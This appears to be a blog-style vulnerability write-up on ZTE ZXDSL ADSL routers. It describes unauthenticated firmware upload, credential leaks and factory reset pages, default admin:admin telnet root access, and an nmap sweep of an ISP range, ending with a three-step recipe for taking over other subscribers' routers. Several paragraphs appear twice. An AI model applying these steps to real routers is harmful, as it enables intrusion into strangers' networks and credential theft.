ZTE is providing a ADSL routers in my home country. Since there is only one ISP and they are giving everyone ZTE routers when they get ADSL internet I thought looking into this would be interesting. Even though different router models are given, I was surprised to find out how similarly the software operated. After testing about 7 different ZXDSL models, I think all these bugs are present in all ZTE ZXDSL routers
Here is how it started, I got a new DSL internet modem (ZTE ZXDSL 831 II) and after some use, I forgot my password. I couldn't connect to the internet nor could I simply go to 192.168.1.1 and change my credentials (it used Basic HTTP Auth to authenticate, so bruteforce was an option...) but I took it as a challenge and try to get inside without brute. so I download the firmware...
It quickly turned out that not only was I able to hack it and root it, it was also very easy to hack all the people around me (people using broadband in the country (if you know ip range ;O -- thanks to there only being one ISP and one router it uses by default)) and then write about it.
Since I wasn't able to find a direct way to access the modem directly using the IP, I started requesting some of the pages you encounter after auth.... and turns out most of those files were returning to me without a 401 Unauthorized error (unlike the login page), which is obviously Insecure Direct Object Reference vul. I quickly realized ZTE router programmers really don't know what IDOR bugs are, almost all ZTE routers I tested after this had similar IDOR bugs letting me bypass authentication if I know the name of the page.
note that the modem comes with admin:admin password credentials, which is enough info to pwn people using the known IP range. But for those that change their default ssh/telnet and http logins, we need a different bug.
Here is how it started, I got a new DSL internet modem (ZTE ZXDSL 831 II) and after some use, I forgot my password. I couldn't connect to the internet nor could I simply go to 192.168.1.1 and change my credentials (it used Basic HTTP Auth to authenticate, so bruteforce was an option...) but I took it as a challenge and try to get inside without brute. so I download the firmware...
It quickly turned out that not only was I able to hack it and root it, it was also very easy to hack all the people around me (people using broadband in the country (if you know ip range ;O -- thanks to there only being one ISP and one router it uses by default)) and then write about it.
Since I wasn't able to find a direct way to access the modem directly using the IP, I started requesting some of the pages you encounter after auth.... and turns out most of those files were returning to me without a 401 Unauthorized error (unlike the login page), which is obviously Insecure Direct Object Reference vul. I quickly realized ZTE router programmers really don't know what IDOR bugs are, almost all ZTE routers I tested after this had similar IDOR bugs letting me bypass authentication if I know the name of the page.
note that the modem comes with admin:admin password credentials, which is enough info to pwn people using the known IP range. But for those that change their default ssh/telnet and http logins, we need a different bug.
IDOR 1: Allows Root RCE
requesting http://<router-IP>/upload.cgi didn't throw up a 401 error. it just gives the upload page, Insecure Direct Object Reference. awesome! Here, we can upload a new firmware for the router. We can add a malicious binary/shell.in the squashfs file of the firmware and upload it, granting us persistent root access.
IDOR 2: Information Disclosure
IDOR 2: Information Disclosure
Another bug I found was awesome, requesting http://<router-IP>/pppoe.cgi would turn out the pppoe password and username when you view source. oouch!
If an attacker, who is NOT authenticated requests http://<router-IP>/resetrouter.cgi the router would reset all settings to factory mode without any confirmation or warning.
So the root password for ssh, and HTTP interface become admin:admin again, yay!
When I port scanned it using nmap -sV 192.168.1.1 and it returned
...
23/tcp open telnet ZXDSL 831CII ADSL modem telnetd 5.2.0a_E29_ET
...
While SSH is disabled by default, looks like telnet isn't. and it looks like the default username and password works. After telneting we are greeted with a terrible shell. but if you type "sh" suddenly you are greeted with a busy box shell.
# cat /proc/cpuinfo
system type : 96338L-2M-8M
processor : 0
cpu model : BCM6338 V1.0
BogoMIPS : 239.20
wait instruction : no
microsecond timers : yes
tlb_entries : 32
extra interrupt vector : yes
hardware watchpoint : no
unaligned access : 1289794
VCED exceptions : not available
VCEI exceptions : not available
Dead performance!
So I did, "cat /proc/meminfo" (6MB it holds), then "cat /proc/version" and it returned
...
Linux version 2.6.8.1 (root@host.domain.com)
...
Even though there was a public local exploit to that kernel simply typing "echo $USER" revealed I was always root. no need to root shit. Simple as that.
going to, http://192.168.1.1/menu_status.html gives public ip address of the router without auth. (aside from lots of easier ways), it was 10.136.0.16 (obvioulsy not the real IP)
so lets scan my IP range to see what we find "nmap --open -sS -sV -T4 10.136.*.*/24 -p 80 -oG - | grep 'open' "
and quickly found out at least 4800 other routers online. You know its ez:
1. Attacker goes to https://<router-ip>/resetrouter.cgi
2. telnet <router-ip> admin:admin
3. pwn!
Well, that was a fun recovery time!
Happy Hacking!
Happy Hacking!
Edit: btw I contacted ZTE and they said they will make better routers in the future, and will not be realizing patches for these modules.
Conclusion: ZTE makes bad routers, most "different models" run the same services, similar holes. it wasnt built in having security in mind. run if you see one! dont buy it! sue me!
and ya, disable remote logins to telnet, http etc. ;)
Conclusion: ZTE makes bad routers, most "different models" run the same services, similar holes. it wasnt built in having security in mind. run if you see one! dont buy it! sue me!
and ya, disable remote logins to telnet, http etc. ;)